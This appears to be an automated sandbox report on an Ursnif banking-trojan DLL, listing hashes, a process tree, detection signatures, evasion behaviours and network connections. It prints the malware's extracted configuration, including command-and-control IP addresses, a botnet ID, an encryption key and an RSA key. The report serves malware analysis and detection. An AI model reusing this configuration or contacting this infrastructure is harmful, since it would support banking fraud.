Edit tour

Windows Analysis Report
62835e34e60c1.dll

Overview

General Information

Sample Name:	62835e34e60c1.dll
Analysis ID:	628111
MD5:	5572213d17be7de71f36fa68eb6808a8
SHA1:	5e8b27d57f6c9dc02cf2e30d47f8ed439f0fa20e
SHA256:	f58f9c8e6a62223efa263da10850e188004471cb2be65264b7f91f27ebab0766
Tags:	DHLdllgoziisfbitalyursnif
Infos:

Detection

Ursnif

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Ursnif

Writes registry values via WMI

Machine Learning detection for sample

Uses 32bit PE files

Sample file is different than original file name gathered from version info

One or more processes crash

PE file contains an invalid checksum

PE file contains strange resources

Found evasive API chain checking for process token information

Uses code obfuscation techniques (call, push, ret)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Checks if the current process is being debugged

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Contains functionality to call native functions

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Contains functionality to dynamically determine API calls

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6164 cmdline: loaddll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 6168 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5644 cmdline: rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 6400 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 400 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 6260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 408 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 6516 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 412 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "uFHdIp1dwWhvkEA2yTiBbeuMW6YDB1lsKD5xr+wbKQpSTgCxKW/AXnU7L/HiYIBOAaOvelJb2/pY2jRw/FTeNeGEktAn4DWXMKOPXXT0NA64cjWTlmZ01c3ZQu3caOM/Vp3zMRoE3uvOCFkw5pB9m5AVXCHf7c66rMBTCpzNlB06TLav0Zslv7QoNXagpBRObC3w6aRV9zoEMPsKo8dDtjcXrpjT3cmo/nK2BeLeCRHw4m+Z1wNt/QFKG0JSvLN7KWGp2TqLTGCk8sWmJopJGBcCeH8dEEcUduFFgdi8Cilu/K4cd0diqylW1QdRW2VJSAgt/TyNLQ8XGjESLVVFp5dI5rtAU8yovXe+vZ9IsF8=", "c2_domain": ["config.edge.skype.com", "185.189.151.28", "185.189.151.70"], "botnet": "3000", "server": "50", "serpent_key": "noA8W2qeaw7z6wk9", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.484657934.0000000004E68000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.952141465.0000000004E68000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.484722678.0000000004E68000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.484767024.0000000004E68000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.484830136.0000000004E68000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.484908156.0000000004E68000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.484856150.0000000004E68000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.484800968.0000000004E68000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.952020427.0000000004839000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000003.484551463.0000000004E68000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 5644	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
3.2.rundll32.exe.400000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.48394a0.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.44b0000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.48394a0.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Snort Signatures

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.5 - Destination IP: 13.107.43.16

Timestamp:	192.168.2.513.107.43.1649772802033203 05/17/22-10:46:47.467879
SID:	2033203
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 3.2.rundll32.exe.48394a0.2.raw.unpack

Malware Configuration Extractor: Ursnif {"RSA Public Key": "uFHdIp1dwWhvkEA2yTiBbeuMW6YDB1lsKD5xr+wbKQpSTgCxKW/AXnU7L/HiYIBOAaOvelJb2/pY2jRw/FTeNeGEktAn4DWXMKOPXXT0NA64cjWTlmZ01c3ZQu3caOM/Vp3zMRoE3uvOCFkw5pB9m5AVXCHf7c66rMBTCpzNlB06TLav0Zslv7QoNXagpBRObC3w6aRV9zoEMPsKo8dDtjcXrpjT3cmo/nK2BeLeCRHw4m+Z1wNt/QFKG0JSvLN7KWGp2TqLTGCk8sWmJopJGBcCeH8dEEcUduFFgdi8Cilu/K4cd0diqylW1QdRW2VJSAgt/TyNLQ8XGjESLVVFp5dI5rtAU8yovXe+vZ9IsF8=", "c2_domain": ["config.edge.skype.com", "185.189.151.28", "185.189.151.70"], "botnet": "3000", "server": "50", "serpent_key": "noA8W2qeaw7z6wk9", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Multi AV Scanner detection for submitted file

Source: 62835e34e60c1.dll

ReversingLabs: Detection: 29%

Machine Learning detection for sample

Source: 62835e34e60c1.dll

Joe Sandbox ML: detected

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_044B5FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

3_2_044B5FBB

Source: 62835e34e60c1.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source:

Binary string: uwGXyM.pdb source: loaddll32.exe, 00000000.00000000.453061272.000000000040D000.00000002.00000001.01000000.00000003.sdmp, 62835e34e60c1.dll

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.189.151.28 80			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.189.151.70 80			Jump to behavior

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49772 -> 13.107.43.16:80

Source: global traffic	TCP traffic: 192.168.2.5:49784 -> 185.189.151.28:80
Source: global traffic	TCP traffic: 192.168.2.5:49878 -> 185.189.151.70:80

Source: Joe Sandbox View	ASN Name: AS-SOFTPLUSCH AS-SOFTPLUSCH
Source: Joe Sandbox View	ASN Name: AS-SOFTPLUSCH AS-SOFTPLUSCH

Source: Joe Sandbox View

IP Address: 185.189.151.28 185.189.151.28

Source: unknown	TCP traffic detected without corresponding DNS query: 185.189.151.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.189.151.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.189.151.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.189.151.70
Source: unknown	TCP traffic detected without corresponding DNS query: 185.189.151.70
Source: unknown	TCP traffic detected without corresponding DNS query: 185.189.151.70

Source: rundll32.exe, 00000003.00000002.952097072.0000000004A0B000.00000004.00000010.00020000.00000000.sdmp

String found in binary or memory: http://185.18

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_044B1CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,

3_2_044B1CA5

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Ursnif

Source: Yara match	File source: 00000003.00000003.484657934.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.952141465.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484722678.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484767024.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484830136.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484908156.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484856150.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484800968.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484551463.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5644, type: MEMORYSTR
Source: Yara match	File source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.48394a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.44b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.48394a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.952020427.0000000004839000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Yara detected Ursnif

Source: Yara match	File source: 00000003.00000003.484657934.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.952141465.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484722678.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484767024.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484830136.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484908156.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484856150.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484800968.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484551463.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5644, type: MEMORYSTR
Source: Yara match	File source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.48394a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.44b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.48394a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.952020427.0000000004839000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_044B5FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

3_2_044B5FBB

System Summary

Writes registry values via WMI

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: 62835e34e60c1.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 62835e34e60c1.dll

Binary or memory string: OriginalFilenamemyfile.exe$ vs 62835e34e60c1.dll

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 400

Source: 62835e34e60c1.dll

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00402274	3_2_00402274
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_044B1645	3_2_044B1645
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_044B829C	3_2_044B829C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_044B4BF1	3_2_044B4BF1

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00402067 NtMapViewOfSection,	3_2_00402067
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00401000 NtCreateSection,memset,	3_2_00401000
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00401308 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	3_2_00401308
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00402495 NtQueryVirtualMemory,	3_2_00402495
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_044B4321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_044B4321
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_044B84C1 NtQueryVirtualMemory,	3_2_044B84C1

Source: 62835e34e60c1.dll

ReversingLabs: Detection: 29%

Source: 62835e34e60c1.dll

Static PE information: Section: .text IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_LNK_OVER, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_GPREL, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_044B68BD CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_044B68BD

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 400
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 408
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 412
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6164

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1D5.tmp

Jump to behavior

Source: classification engine

Classification label: mal96.troj.evad.winDLL@8/12@0/2

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source:

Binary string: uwGXyM.pdb source: loaddll32.exe, 00000000.00000000.453061272.000000000040D000.00000002.00000001.01000000.00000003.sdmp, 62835e34e60c1.dll

Source: 62835e34e60c1.dll

Static PE information: real checksum: 0x79835 should be: 0x6cbe1

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00402263 push ecx; ret	3_2_00402273
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00402210 push ecx; ret	3_2_00402219
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_044B828B push ecx; ret	3_2_044B829B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_044B7EA0 push ecx; ret	3_2_044B7EA9

Source: 62835e34e60c1.dll

Static PE information: section name: .erloc

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_004015E3 LoadLibraryA,GetProcAddress,

3_2_004015E3

Hooking and other Techniques for Hiding and Protection

Yara detected Ursnif

Source: Yara match	File source: 00000003.00000003.484657934.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.952141465.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484722678.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484767024.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484830136.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484908156.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484856150.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484800968.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.484551463.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5644, type: MEMORYSTR
Source: Yara match	File source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.48394a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.44b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.48394a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.952020427.0000000004839000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\WerFault.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_004015E3 LoadLibraryA,GetProcAddress,

3_2_004015E3

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.189.151.28 80			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.189.151.70 80			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

